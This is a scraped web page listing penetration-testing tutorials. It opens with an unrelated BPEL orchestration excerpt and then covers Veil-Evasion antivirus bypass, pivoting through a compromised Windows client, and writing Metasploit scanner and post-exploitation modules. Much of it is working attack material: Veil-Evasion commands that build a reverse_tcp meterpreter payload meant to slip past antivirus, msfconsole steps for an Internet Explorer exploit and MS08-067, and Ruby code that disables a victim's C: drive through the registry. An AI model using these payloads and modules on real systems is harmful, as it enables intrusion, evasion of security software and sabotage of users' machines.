Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Conferences
Free Learning
Arrow right icon

How-To Tutorials - Penetration Testing

54 Articles
article-image-article-test123
Packt
16 Jul 2014
13 min read
Save for later

test-article

Packt
16 Jul 2014
13 min read
Service Invocation Time for action – creating the book warehousing process Let's create the BookWarehousingBPEL BPEL process: We will open the SOA composite by double-clicking on the Bookstore in the process tree. In the composite, we can see both Bookstore BPEL processes and their WSDL interfaces. We will add a new BPEL process by dragging-and-dropping the BPEL Process service component from the right-hand side toolbar. An already-familiar dialog window will open, where we will specify the BPEL 2.0 version, enter the process name as BookWarehousingBPEL, modify the namespace to http://packtpub.com/Bookstore/BookWarehousingBPEL, and select Synchronous BPEL Process. We will leave all other fields to their default values: Insert image 8963EN_02_03.png Next, we will wire the BookWarehousingBPEL component with the BookstoreABPEL and BookstoreBBPEL components. This way, we will establish a partner link between them. First, we will create the wire to the BookstoreBBPEL component (although the order doesn't matter). To do this, you have to click on the bottom-right side of the component. Once you place the mouse pointer above the component, circles on the edges will appear. You need to start with the circle labelled as Drag to add a new Reference and connect it with the service interface circle, as shown in the following figure: Insert image 8963EN_02_04.png You do the same to wire the BookWarehousingBPEL component with the BookstoreABPEL component: Insert image 8963EN_02_05.png We should see the following screenshot. Please notice that the BookWarehousingBPEL component is wired to the BookstoreABPEL and BookstoreBBPEL components: Insert image 8963EN_02_06.png What just happened? We have added the BookWarehousingBPEL component to our SOA composite and wired it to the BookstoreABPEL and BookstoreBBPEL components. Creating the wires between components means that references have been created and relations between components have been established. In other words, we have expressed that the BookWarehousingBPEL component will be able to invoke the BookstoreABPEL and BookstoreBBPEL components. This is exactly what we want to achieve with our BookWarehousingBPEL process, which will orchestrate both bookstore BPELs. Once we have created the components and wired them accordingly, we are ready to implement the BookWarehousingBPEL process. What just happened? We have implemented the process flow logic for the BookWarehousingBPEL process. It actually orchestrated two other services. It invoked the BookstoreA and BookstoreB BPEL processes that we've developed in the previous chapter. Here, these two BPEL processes acted like services. First, we have created the XML schema elements for the request and response messages of the BPEL process. We have created four variables: BookstoreARequest, BookstoreAResponse, BookstoreBRequest, and BookstoreBResponse. The BPEL code for variable declaration looks like the code shown in the following screenshot: Insert image 8963EN_02_18b.png Then, we have added the <assign> activity to prepare a request for both the bookstore BPEL processes. Then, we have copied the BookData element from inputVariable to the BookstoreARequest and BookstoreBRequest variables. The following BPEL code has been generated: Insert image 8963EN_02_18c.png Next, we have invoked both the bookstore BPEL services using the <invoke> activity. The BPEL source code reads like the following screenshot: Insert image 8963EN_02_18d.png Finally, we have added the <if> activity to select the bookstore with the lowest stock quantity: Insert image 8963EN_02_18e.png With this, we have concluded the development of the book warehousing BPEL process and are ready to deploy and test it. Deploying and testing the book warehousing BPEL We will deploy the project to the SOA Suite process server the same way as we did in the previous chapter, by right-clicking on the project and selecting Deploy. Then, we will navigate through the options. As we redeploy the whole SOA composite, make sure the Overwrite option is selected. You should check if the compilation and the deployment have been successful. Then, we will log in to the Enterprise Manager console, select the project bookstore, and click on the Test button. Be sure to select bookwarehousingbpel_client for the test. After entering the parameters, as shown in the following figure, we can click on the Test Web Service button to initiate the BPEL process, and we should receive an answer (Bookstore A or Bookstore B, depending on the data that we have entered). Remember that our BookWarehousingBPEL process actually orchestrated two other services. It invoked the BookstoreA and BookstoreB BPEL processes. To verify this, we can launch the flow trace (click on the Launch Flow Trace button) in the Enterprise Manager console, and we will see that the two bookstore BPEL processes have been invoked, as shown: Insert image 8963EN_02_19.png An even more interesting view is the flow view, which also shows that both bookstore services have been invoked. Click on BookWarehousingBPEL to open up the audit trail: Insert image 8963EN_02_20.png Understanding partner links When invoking services, we have often mentioned partner links. Partner links denote all the interactions that a BPEL process has with the external services. There are two possibilities: The BPEL process invokes operations on other services. The BPEL process receives invocations from clients. One of the clients is the user of the BPEL process, who makes the initial invocation. Other clients are services, for example, those that have been invoked by the BPEL process, but may return replies. Links to all the parties that BPEL interacts with are called partner links. Partner links can be links to services that are invoked by the BPEL process. These are sometimes called invoked partner links. Partner links can also be links to clients, and can invoke the BPEL process. Such partner links are sometimes called client partner links. Note that each BPEL process has at least one client partner link, because there has to be a client that first invokes the BPEL process. Usually, a BPEL process will also have several invoked partner links, because it will most likely invoke several services. In our case, the BookWarehousingBPEL process has one client partner link and two invoked partner links, BookstoreABPEL and BookstoreBBPEL. You can observe this on the SOA composite design view and on the BPEL process itself, where the client partner links are located on the left-hand side, while the invoked partner links are located on the right-hand side of the design view. Partner link types Describing situations where the service is invoked by the process and vice versa requires selecting a certain perspective. We can select the process perspective and describe the process as requiring portTypeA on the service and providing portTypeB to the service. Alternatively, we select the service perspective and describe the service as offering portTypeA to the BPEL process and requiring portTypeB from the process. Partner link types allow us to model such relationships as a third party. We are not required to take a certain perspective; rather, we just define roles. A partner link type must have at least one role and can have at most two roles. The latter is the usual case. For each role, we must specify a portType that is used for interaction. Partner link types are defined in the WSDLs. If we take a closer look at the BookWarehousingBPEL.wsdl file, we can see the following partner link type definition: Insert image 8963EN_02_22.png If we specify only one role, we express the willingness to interact with the service, but do not place any additional requirements on the service. Sometimes, existing services will not define a partner link type. Then, we can wrap the WSDL of the service and define partner link types ourselves. Now that we have become familiar with the partner link types and know that they belong to WSDL, it is time to go back to the BPEL process definition, more specifically to the partner links. Defining partner links Partner links are concrete references to services that a BPEL business process interacts with. They are specified near the beginning of the BPEL process definition document, just after the <process> tag. Several <partnerLink> definitions are nested within the <partnerLinks> element: <process ...>   <partnerLinks>   <partnerLink ... /> <partnerLink ... />        ...      </partnerLinks>   <sequence>      ... </sequence> </process> For each partner link, we have to specify the following: name: This serves as a reference for interactions via that partner link. partnerLinkType: This defines the type of the partner link. myRole: This indicates the role of the BPEL process itself. partnerRole: This indicates the role of the partner. initializePartnerRole: This indicates whether the BPEL engine should initialize the partner link's partner role value. This is an optional attribute and should only be used with partner links that specify the partner role. We define both roles (myRole and partnerRole) only if the partnerLinkType specifies two roles. If the partnerLinkType specifies only one role, the partnerLink also has to specify only one role—we omit the one that is not needed. Let's go back to our example, where we have defined the BookstoreABPEL partner link type. To define a partner link, we need to specify the partner roles, because it is a synchronous relation. The definition is shown in the following code excerpt: Insert image 8963EN_02_23.png With this, we have concluded the discussion on partner links and partner link types. We will continue with the parallel service invocation. Parallel service invocation BPEL also supports parallel service invocation. In our example, we have invoked Bookstore A and Bookstore B sequentially. This way, we need to wait for the response from the first service and then for the response from the second service. If these services take longer to execute, the response times will be added together. If we invoke both services in parallel, we only need to wait for the duration of the longer-lasting call, as shown in the following screenshot: BPEL has several possibilities for parallel flows, which will be described in detail in Chapter 8, Dynamic Parallel Invocations. Here, we present the basic parallel service invocation using the <flow> activity. Insert image 8963EN_02_24.png To invoke services in parallel, or to perform any other activities in parallel, we can use the <flow> activity. Within the <flow> activity, we can nest an arbitrary number of flows, and all will execute in parallel. Let's try and modify our example so that Bookstore A and B will be invoked in parallel. Time for action – developing parallel flows Let's now modify the BookWarehousingBPEL process so that the BookstoreA and BookstoreB services will be invoked in parallel. We should do the following: To invoke BookstoreA and BookstoreB services in parallel, we need to add the Flow structured activity to the process flow just before the first invocation, as shown in the following screenshot: Insert image 8963EN_02_25.png We see that two parallel branches have been created. We simply drag-and-drop both the invoke activities into the parallel branches: Insert image 8963EN_02_26.png That's all! We can create more parallel branches if we need, by clicking on the Add Sequence icon. What just happened? We have modified the BookWarehousingBPEL process so that the BookstoreA and BookstoreB <invoke> activities are executed in parallel. A corresponding <flow>activity has been created in the BPEL source code. Within the <flow> activity, both <invoke> activities are nested. Please notice that each <invoke> activity is placed within its own <sequence> activity. T his would make sense if we would require more than one activity in each parallel branch. The BPEL source code looks like the one shown in the following screenshot: Insert image 8963EN_02_27.png Deploying and testing the parallel invocation We will deploy the project to the SOA Suite process server the same way we did in the previous sample. Then, we will log in to the Enterprise Manager console, select the project Bookstore, and click on the Test Web Service button. To observe that the services have been invoked in parallel, we can launch the flow trace (click on the Launch Flow Trace button) in the Enterprise Manager console, click on the book warehousing BPEL processes, and activate the flow view, which shows that both bookstore services have been invoked in parallel. Understanding parallel flow To invoke services concurrently, we can use the <flow> construct. In the following example, the three <invoke> operations will perform concurrently: <process ...>    ... <sequence> <!-- Wait for the incoming request to start the process --> <receive ... />   <!-- Invoke a set of related services, concurrently --> <flow> <invoke ... /> <invoke ... /> <invoke ... /> </flow>      ... <!-- Return the response --> <reply ... /> </sequence> </process> We can also combine and nest the <sequence> and <flow> constructs that allow us to define several sequences that execute concurrently. In the following example, we have defined two sequences, one that consists of three invocations, and one with two invocations. Both sequences will execute concurrently: <process ...>    ... <sequence>   <!-- Wait for the incoming request to start the process --> <receive ... />   <!-- Invoke two sequences concurrently --> <flow> <!-- The three invokes below execute sequentially --> <sequence> <invoke ... /> <invoke ... /> <invoke ... /> </sequence> <!-- The two invokes below execute sequentially --> <sequence> <invoke ... /> <invoke ... /> </sequence> </flow>        ... <!-- Return the response --> <reply ... /> </sequence> </process> We can use other activities as well within the <flow> activity to achieve parallel execution. With this, we have concluded our discussion on the parallel invocation. Pop quiz – service invocation Q1. Which activity is used to invoke services from BPEL processes? <receive> <invoke> <sequence> <flow> <process> <reply> Q2. Which parameters do we need to specify for the <invoke> activity? endpointURL partnerLink operationName operation portType portTypeLink Q3. In which file do we declare partner link types? Q4. Which activity is used to execute service invocation and other BPEL activities in parallel? <receive> <invoke> <sequence> <flow> <process> <reply> Summary In this chapter, we learned how to invoke services and orchestrate services. We explained the primary mission of BPEL—service orchestration. It follows the concept of programming-in-the-large. We have developed a BPEL process that has invoked two services and orchestrated them. We have become familiar with the <invoke> activity and understood the service invocation's background, particularly partner links and partner link types. We also learned that from BPEL, it is very easy to invoke services in parallel. To achieve this, we use the <flow> activity. Within <flow>, we can not only nest several <invoke> activities but also other BPEL activities. Now, we are ready to learn about variables and data manipulation, which we will do in the next chapter.  
Read more
  • 0
  • 0
  • 2499

article-image-veil-evasion
Packt
18 Jun 2014
6 min read
Save for later

Veil-Evasion

Packt
18 Jun 2014
6 min read
(For more resources related to this topic, see here.) A new AV-evasion framework, written by Chris Truncer, called Veil-Evasion (www.Veil-Evasion.com), is now providing effective protection against the detection of standalone exploits. Veil-Evasion aggregates various shellcode injection techniques into a framework that simplifies management. As a framework, Veil-Evasion possesses several features, which includes the following: It incorporates custom shellcode in a variety of programming languages, including C, C#, and Python It can use Metasploit-generated shellcode It can integrate third-party tools such as Hyperion (encrypts an EXE file with AES-128 bit encryption), PEScrambler, and BackDoor Factory The Veil-Evasion_evasion.cna script allows for Veil-Evasion to be integrated into Armitage and its commercial version, Cobalt Strike Payloads can be generated and seamlessly substituted into all PsExec calls Users have the ability to reuse shellcode or implement their own encryption methods It's functionality can be scripted to automate deployment Veil-Evasion is under constant development and the framework has been extended with modules such as Veil-Evasion-Catapult (the payload delivery system) Veil-Evasion can generate an exploit payload; the standalone payloads include the following options: Minimal Python installation to invoke shellcode; it uploads a minimal Python.zip installation and the 7zip binary. The Python environment is unzipped, invoking the shellcode. Since the only files that interact with the victim are trusted Python libraries and the interpreter, the victim's AV does not detect or alarm on any unusual activity. Sethc backdoor, which configures the victim's registry to launch the sticky keys RDP backdoor. PowerShell shellcode injector. When the payloads have been created, they can be delivered to the target in one of the following two ways: Upload and execute using Impacket and PTH toolkit UNC invocation Veil-Evasion is available from the Kali repositories, such as Veil-Evasion, and it is automatically installed by simply entering apt-get install veil-evasion in a command prompt. If you receive any errors during installation, re-run the /usr/share/veil-evasion/setup/setup.sh script. Veil-Evasion presents the user with the main menu, which provides the number of payload modules that are loaded as well as the available commands. Typing list will list all available payloads, list langs will list the available language payloads, and list <language> will list the payloads for a specific language. Veil-Evasion's initial launch screen is shown in the following screenshot: Veil-Evasion is undergoing rapid development with significant releases on a monthly basis and important upgrades occurring more frequently. Presently, there are 24 payloads designed to bypass antivirus by employing encryption or direct injection into the memory space. These payloads are shown in the next screenshot: To obtain information on a specific payload, type info<payload number / payload name> or info <tab> to autocomplete the payloads that are available. You can also just enter the number from the list. In the following example, we entered 19 to select the python/shellcode_inject/aes_encrypt payload: The exploit includes an expire_payload option. If the module is not executed by the target user within a specified timeframe, it is rendered inoperable. This function contributes to the stealthiness of the attack. The required options include the name of the options as well as the default values and descriptions. If a required value isn't completed by default, the tester will need to input a value before the payload can be generated. To set the value for an option, enter set <option name> and then type the desired value. To accept the default options and create the exploit, type generate in the command prompt. If the payload uses shellcode, you will be presented with the shellcode menu, where you can select msfvenom (the default shellcode) or a custom shellcode. If the custom shellcode option is selected, enter the shellcode in the form of x01x02, without quotes and newlines (n). If the default msfvenom is selected, you will be prompted with the default payload choice of windows/meterpreter/reverse_tcp. If you wish to use another payload, press Tab to complete the available payloads. The available payloads are shown in the following screenshot: In the following example, the [tab] command was used to demonstrate some of the available payloads; however, the default (windows/meterpreter/reverse_tcp) was selected, as shown in the following screenshot: The user will then be presented with the output menu with a prompt to choose the base name for the generated payload files. If the payload was Python-based and you selected compile_to_exe as an option, the user will have the option of either using Pyinstaller to create the EXE file, or generating Py2Exe files, as shown in the following screenshot: The final screen displays information on the generated payload, as shown in the following screenshot: The exploit could also have been created directly from a command line using the following options: kali@linux:~./Veil-Evasion.py -p python/shellcode_inject/aes_encrypt -o -output --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.43.134 LPORT=4444 Once an exploit has been created, the tester should verify the payload against VirusTotal to ensure that it will not trigger an alert when it is placed on the target system. If the payload sample is submitted directly to VirusTotal and it's behavior flags it as malicious software, then a signature update against the submission can be released by antivirus (AV) vendors in as little as one hour. This is why users are clearly admonished with the message "don't submit samples to any online scanner!" Veil-Evasion allows testers to use a safe check against VirusTotal. When any payload is created, a SHA1 hash is created and added to hashes.txt, located in the ~/veil-output directory. Testers can invoke the checkvt script to submit the hashes to VirusTotal, which will check the SHA1 hash values against its malware database. If a Veil-Evasion payload triggers a match, then the tester knows that it may be detected by the target system. If it does not trigger a match, then the exploit payload will bypass the antivirus software. A successful lookup (not detectable by AV) using the checkvt command is shown as follows: Testing, thus far supports the finding that if checkvt does not find a match on VirusTotal, the payload will not be detected by the target's antivirus software. To use with the Metasploit Framework, use exploit/multi/handler and set PAYLOAD to be windows/meterpreter/reverse_tcp (the same as the Veil-Evasion payload option), with the same LHOST and LPORT used with Veil-Evasion as well. When the listener is functional, send the exploit to the target system. When the listeners launch it, it will establish a reverse shell back to the attacker's system. Summary Kali provides several tools to facilitate the development, selection, and activation of exploits, including the internal exploit-db database as well as several frameworks that simplify the use and management of the exploits. Among these frameworks, the Metasploit Framework and Armitage are particularly important; however, Veil-Evasion enhances both with its ability to bypass antivirus detection. Resources for Article: Further resources on this subject: Kali Linux – Wireless Attacks [Article] Web app penetration testing in Kali [Article] Customizing a Linux kernel [Article]
Read more
  • 0
  • 0
  • 4355

article-image-using-client-pivot-point
Packt
17 Jun 2014
6 min read
Save for later

Using the client as a pivot point

Packt
17 Jun 2014
6 min read
Pivoting To set our potential pivot point, we first need to exploit a machine. Then we need to check for a second network card in the machine that is connected to another network, which we cannot reach without using the machine that we exploit. As an example, we will use three machines with the Kali Linux machine as the attacker, a Windows XP machine as the first victim, and a Windows Server 2003 machine the second victim. The scenario is that we get a client to go to our malicious site, and we use an exploit called Use after free against Microsoft Internet Explorer. This type of exploit has continued to plague the product for a number of revisions. An example of this is shown in the following screenshot from the Exploit DB website: The exploit listed at the top of the list is one that is against Internet Explorer 9. As an example, we will target the exploit that is against Internet Explorer 8; the concept of the attack is the same. In simple terms, Internet Explorer developers continue to make the mistake of not cleaning up memory after it is allocated. Start up your metasploit tool by entering msfconsole. Once the console has come up, enter search cve-2013-1347 to search for the exploit. An example of the results of the search is shown in the following screenshot: One concern is that it is rated as good, but we like to find ratings of excellent or better when we select our exploits. For our purposes, we will see whether we can make it work. Of course, there is always a chance we will not find what we need and have to make the choice to either write our own exploit or document it and move on with the testing. For the example we use here, the Kali machine is 192.168.177.170, and it is what we set our LHOST to. For your purposes, you will have to use the Kali address that you have. We will enter the following commands in the metasploit window: use exploit/windows/browser/ie_cgenericelement_uaf set SRVHOST 192.168.177.170 set LHOST 192.168.177.170 set PAYLOAD windows/meterpreter/reverse_tcp exploit An example of the results of the preceding command is shown in the following screenshot: As the previous screenshot shows, we now have the URL that we need to get the user to access. For our purposes, we will just copy and paste it in Internet Explorer 8, which is running on the Windows XP Service Pack 3 machine. Once we have pasted it, we may need to refresh the browser a couple of times to get the payload to work; however, in real life, we get just one chance, so select your exploits carefully so that one click by the victim does the intended work. Hence, to be a successful tester, a lot of practice and knowledge about the various exploits is of the utmost importance. An example of what you should see once the exploit is complete and your session is created is shown in the following screenshot: Screen showing an example of what you should see once the exploit is complete and your session is created (the cropped text is not important) We now have a shell on the machine, and we want to check whether it is dual-homed. In the Meterpreter shell, enter ipconfig to see whether the machine you have exploited has a second network card. An example of the machine we exploited is shown in the following screenshot: As the previous screenshot shows, we are in luck. We have a second network card connected and another network for us to explore, so let us do that now. The first thing we have to do is set the shell up to route to our newly found network. This is another reason why we chose the Meterpreter shell, it provides us with the capability to set the route up. In the shell, enter run autoroute –s 10.2.0.0/24 to set a route up to our 10 network. Once the command is complete, we will view our routing table and enter run autoroute –p to display the routing table. An example of this is shown in the following screenshot: As the previous screenshot shows, we now have a route to our 10 network via session 1. So, now it is time to see what is on our 10 network. Next, we will add a background to our session 1; press the Ctrl+ Z to background the session. We will use the scan capability from within our metasploit tool. Enter the following commands: use auxiliary/scanner/portscan/tcp set RHOSTS 10.2.0.0/24 set PORTS 139,445 set THREADS 50 run The port scanner is not very efficient, and the scan will take some time to complete. You can elect to use the Nmap scanner directly in metasploit. Enter nmap –sP 10.2.0.0/24. Once you have identified the live systems, conduct the scanning methodology against the targets. For our example here, we have our target located at 10.2.0.149. An example of the results for this scan is shown in the following screenshot: We now have a target, and we could use a number of methods we covered earlier against it. For our purposes here, we will see whether we can exploit the target using the famous MS08-067 Service Server buffer overflow. In the metasploit window, set the session in the background and enter the following commands: use exploit/windows/smb/ms08_067_netapi set RHOST 10.2.0.149 set PAYLOAD windows/meterpreter/bind_tcp exploit If all goes well, you should see a shell open on the machine. When it does, enter ipconfig to view the network configuration on the machine. From here, it is just a matter of carrying out the process that we followed before, and if you find another dual-homed machine, then you can make another pivot and continue. An example of the results is shown in the following screenshot: As the previous screenshot shows, the pivot was successful, and we now have another session open within metasploit. This is reflected with the Local Pipe | Remote Pipe reference. Once you complete reviewing the information, enter sessions to display the information for the sessions. An example of this result is shown in the following screenshot: Summary In this article, we looked at the powerful technique of establishing a pivot point from a client. Resources for Article: Further resources on this subject: Installation of Oracle VM VirtualBox on Linux [article] Using Virtual Destinations (Advanced) [article] Quick Start into Selenium Tests [article]
Read more
  • 0
  • 0
  • 2971

article-image-metasploit-custom-modules-and-meterpreter-scripting
Packt
03 Jun 2014
10 min read
Save for later

Metasploit Custom Modules and Meterpreter Scripting

Packt
03 Jun 2014
10 min read
(For more resources related to this topic, see here.) Writing out a custom FTP scanner module Let's try and build a simple module. We will write a simple FTP fingerprinting module and see how things work. Let's examine the code for the FTP module: require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Apex FTP Detector', 'Description' => '1.0', 'Author' => 'Nipun Jaswal', 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(21), ], self.class) End We start our code by defining the required libraries to refer to. We define the statement require 'msf/core' to include the path to the core libraries at the very first step. Then, we define what kind of module we are creating; in this case, we are writing an auxiliary module exactly the way we did for the previous module. Next, we define the library files we need to include from the core library set. Here, the include Msf::Exploit::Remote::Ftp statement refers to the /lib/msf/core/exploit/ftp.rb file and include Msf::Auxiliary::Scanner refers to the /lib/msf/core/auxiliary/scanner.rb file. We have already discussed the scanner.rb file in detail in the previous example. However, the ftp.rb file contains all the necessary methods related to FTP, such as methods for setting up a connection, logging in to the FTP service, sending an FTP command, and so on. Next, we define the information of the module we are writing and attributes such as name, description, author name, and license in the initialize method. We also define what options are required for the module to work. For example, here we assign RPORT to port 21 by default. Let's continue with the remaining part of the module: def run_host(target_host) connect(true, false) if(banner) print_status("#{rhost} is running #{banner}") end disconnect end end We define the run_host method, which will initiate the process of connecting to the target by overriding the run_host method from the /lib/msf/core/auxiliary/scanner.rb file. Similarly, we use the connect function from the /lib/msf/core/exploit/ftp.rb file, which is responsible for initializing a connection to the host. We supply two parameters into the connect function, which are true and false. The true parameter defines the use of global parameters, whereas false turns off the verbose capabilities of the module. The beauty of the connect function lies in its operation of connecting to the target and recording the banner of the FTP service in the parameter named banner automatically, as shown in the following screenshot: Now we know that the result is stored in the banner attribute. Therefore, we simply print out the banner at the end and we disconnect the connection to the target. This was an easy module, and I recommend that you should try building simple scanners and other modules like these. Nevertheless, before we run this module, let's check whether the module we just built is correct with regards to its syntax or not. We can do this by passing the module from an in-built Metasploit tool named msftidy as shown in the following screenshot: We will get a warning message indicating that there are a few extra spaces at the end of line number 19. Therefore, when we remove the extra spaces and rerun msftidy, we will see that no error is generated. This marks the syntax of the module to be correct. Now, let's run this module and see what we gather: We can see that the module ran successfully, and it has the banner of the service running on port 21, which is Baby FTP Server. For further reading on the acceptance of modules in the Metasploit project, refer to https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements. Writing out a custom HTTP server scanner Now, let's take a step further into development and fabricate something a bit trickier. We will create a simple fingerprinter for HTTP services, but with a slightly more complex approach. We will name this file http_myscan.rb as shown in the following code snippet: require 'rex/proto/http' require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Server Service Detector', 'Description' => 'Detects Service On Web Server, Uses GET to Pull Out Information', 'Author' => 'Nipun_Jaswal', 'License' => MSF_LICENSE ) end We include all the necessary library files as we did for the previous modules. We also assign general information about the module in the initialize method, as shown in the following code snippet: def os_fingerprint(response) if not response.headers.has_key?('Server') return "Unknown OS (No Server Header)" end case response.headers['Server'] when /Win32/, /(Windows/, /IIS/ os = "Windows" when /Apache// os = "*Nix" else os = "Unknown Server Header Reporting: "+response.headers['Server'] end return os end def pb_fingerprint(response) if not response.headers.has_key?('X-Powered-By') resp = "No-Response" else resp = response.headers['X-Powered-By'] end return resp end def run_host(ip) connect res = send_request_raw({'uri' => '/', 'method' => 'GET' }) return if not res os_info=os_fingerprint(res) pb=pb_fingerprint(res) fp = http_fingerprint(res) print_status("#{ip}:#{rport} is running #{fp} version And Is Powered By: #{pb} Running On #{os_info}") end end The preceding module is similar to the one we discussed in the very first example. We have the run_host method here with ip as a parameter, which will open a connection to the host. Next, we have send_request_raw, which will fetch the response from the website or web server at / with a GET request. The result fetched will be stored into the variable named res. We pass the value of the response in res to the os_fingerprint method. This method will check whether the response has the Server key in the header of the response; if the Server key is not present, we will be presented with a message saying Unknown OS. However, if the response header has the Server key, we match it with a variety of values using regex expressions. If a match is made, the corresponding value of os is sent back to the calling definition, which is the os_info parameter. Now, we will check which technology is running on the server. We will create a similar function, pb_fingerprint, but will look for the X-Powered-By key rather than Server. Similarly, we will check whether this key is present in the response code or not. If the key is not present, the method will return No-Response; if it is present, the value of X-Powered-By is returned to the calling method and gets stored in a variable, pb. Next, we use the http_fingerprint method that we used in the previous examples as well and store its result in a variable, fp. We simply print out the values returned from os_fingerprint, pb_fingerprint, and http_fingerprint using their corresponding variables. Let's see what output we'll get after running this module: Msf auxiliary(http_myscan) > run [*]192.168.75.130:80 is running Microsoft-IIS/7.5 version And Is Powered By: ASP.NET Running On Windows [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Writing out post-exploitation modules Now, as we have seen the basics of module building, we can take a step further and try to build a post-exploitation module. A point to remember here is that we can only run a post-exploitation module after a target compromises successfully. So, let's begin with a simple drive disabler module which will disable C: at the target system: require 'msf/core' require 'rex' require 'msf/core/post/windows/registry' class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry def initialize super( 'Name' => 'Drive Disabler Module', 'Description' => 'C Drive Disabler Module', 'License' => MSF_LICENSE, 'Author' => 'Nipun Jaswal' ) End We started in the same way as we did in the previous modules. We have added the path to all the required libraries we need in this post-exploitation module. However, we have added include Msf::Post::Windows::Registry on the 5th line of the preceding code, which refers to the /core/post/windows/registry.rb file. This will give us the power to use registry manipulation functions with ease using Ruby mixins. Next, we define the type of module and the intended version of Metasploit. In this case, it is Post for post-exploitation and Metasploit3 is the intended version. We include the same file again because this is a single file and not a separate directory. Next, we define necessary information about the module in the initialize method just as we did for the previous modules. Let's see the remaining part of the module: def run key1="HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\" print_line("Disabling C Drive") meterpreter_registry_setvaldata(key1,'NoDrives','4','REG_DWORD') print_line("Setting No Drives For C") meterpreter_registry_setvaldata(key1,'NoViewOnDrives','4','REG_DWORD') print_line("Removing View On The Drive") print_line("Disabled C Drive") end end #class We created a variable called key1, and we stored the path of the registry where we need to create values to disable the drives in it. As we are in a meterpreter shell after the exploitation has taken place, we will use the meterpreter_registry_setval function from the /core/post/windows/registry.rb file to create a registry value at the path defined by key1. This operation will create a new registry key named NoDrives of the REG_DWORD type at the path defined by key1. However, you might be wondering why we have supplied 4 as the bitmask. To calculate the bitmask for a particular drive, we have a little formula, 2^([drive character serial number]-1) . Suppose, we need to disable the C drive. We know that character C is the third character in alphabets. Therefore, we can calculate the exact bitmask value for disabling the C drive as follows: 2^ (3-1) = 2^2= 4 Therefore, the bitmask is 4 for disabling C:. We also created another key, NoViewOnDrives, to disable the view of these drives with the exact same parameters. Now, when we run this module, it gives the following output: So, let's see whether we have successfully disabled C: or not: Bingo! No C:. We successfully disabled C: from the user's view. Therefore, we can create as many post-exploitation modules as we want according to our need. I recommend you put some extra time toward the libraries of Metasploit. Make sure you have user-level access rather than SYSTEM for the preceding script to work, as SYSTEM privileges will not create the registry under HKCU. In addition to this, we have used HKCU instead of writing HKEY_CURRENT_USER, because of the inbuilt normalization that will automatically create the full form of the key. I recommend you check the registry.rb file to see the various available methods.
Read more
  • 0
  • 0
  • 5639
Banner background image

article-image-ruby-and-metasploit-modules
Packt
23 May 2014
11 min read
Save for later

Ruby and Metasploit Modules

Packt
23 May 2014
11 min read
(For more resources related to this topic, see here.) Reinventing Metasploit Consider a scenario where the systems under the scope of the penetration test are very large in number, and we need to perform a post-exploitation function such as downloading a particular file from all the systems after exploiting them. Downloading a particular file from each system manually will consume a lot of time and will be tiring as well. Therefore, in a scenario like this, we can create a custom post-exploitation script that will automatically download a file from all the systems that are compromised. This article focuses on building programming skill sets for Metasploit modules. This article kicks off with the basics of Ruby programming and ends with developing various Metasploit modules. In this article, we will cover the following points: Understanding the basics of Ruby programming Writing programs in Ruby programming Exploring modules in Metasploit Writing your own modules and post-exploitation modules Let's now understand the basics of Ruby programming and gather the required essentials we need to code Metasploit modules. Before we delve deeper into coding Metasploit modules, we must know the core features of Ruby programming that are required in order to design these modules. However, why do we require Ruby for Metasploit? The following key points will help us understand the answer to this question: Constructing an automated class for reusable code is a feature of the Ruby language that matches the needs of Metasploit Ruby is an object-oriented style of programming Ruby is an interpreter-based language that is fast and consumes less development time Earlier, Perl used to not support code reuse Ruby – the heart of Metasploit Ruby is indeed the heart of the Metasploit framework. However, what exactly is Ruby? According to the official website, Ruby is a simple and powerful programming language. Yokihiru Matsumoto designed it in 1995. It is further defined as a dynamic, reflective, and general-purpose object-oriented programming language with functions similar to Perl. You can download Ruby for Windows/Linux from http://rubyinstaller.org/downloads/. You can refer to an excellent resource for learning Ruby practically at http://tryruby.org/levels/1/challenges/0. Creating your first Ruby program Ruby is an easy-to-learn programming language. Now, let's start with the basics of Ruby. However, remember that Ruby is a vast programming language. Covering all the capabilities of Ruby will push us beyond the scope of this article. Therefore, we will only stick to the essentials that are required in designing Metasploit modules. Interacting with the Ruby shell Ruby offers an interactive shell too. Working on the interactive shell will help us understand the basics of Ruby clearly. So, let's get started. Open your CMD/terminal and type irb in it to launch the Ruby interactive shell. Let's input something into the Ruby shell and see what happens; suppose I type in the number 2 as follows: irb(main):001:0> 2 => 2 The shell throws back the value. Now, let's give another input such as the addition operation as follows: irb(main):002:0> 2+3 => 5 We can see that if we input numbers using an expression style, the shell gives us back the result of the expression. Let's perform some functions on the string, such as storing the value of a string in a variable, as follows: irb(main):005:0> a= "nipun" => "nipun" irb(main):006:0> b= "loves metasploit" => "loves metasploit" After assigning values to the variables a and b, let's see what the shell response will be when we write a and a+b on the shell's console: irb(main):014:0> a => "nipun" irb(main):015:0> a+b => "nipunloves metasploit" We can see that when we typed in a as an input, it reflected the value stored in the variable named a. Similarly, a+b gave us back the concatenated result of variables a and b. Defining methods in the shell A method or function is a set of statements that will execute when we make a call to it. We can declare methods easily in Ruby's interactive shell, or we can declare them using the script as well. Methods are an important aspect when working with Metasploit modules. Let's see the syntax: def method_name [( [arg [= default]]...[, * arg [, &expr ]])] expr end To define a method, we use def followed by the method name, with arguments and expressions in parentheses. We also use an end statement following all the expressions to set an end to the method definition. Here, arg refers to the arguments that a method receives. In addition, expr refers to the expressions that a method receives or calculates inline. Let's have a look at an example: irb(main):001:0> def week2day(week) irb(main):002:1> week=week*7 irb(main):003:1> puts(week) irb(main):004:1> end => nil We defined a method named week2day that receives an argument named week. Further more, we multiplied the received argument with 7 and printed out the result using the puts function. Let's call this function with an argument with 4 as the value: irb(main):005:0> week2day(4) 28 => nil We can see our function printing out the correct value by performing the multiplication operation. Ruby offers two different functions to print the output: puts and print. However, when it comes to the Metasploit framework, the print_line function is used. Variables and data types in Ruby A 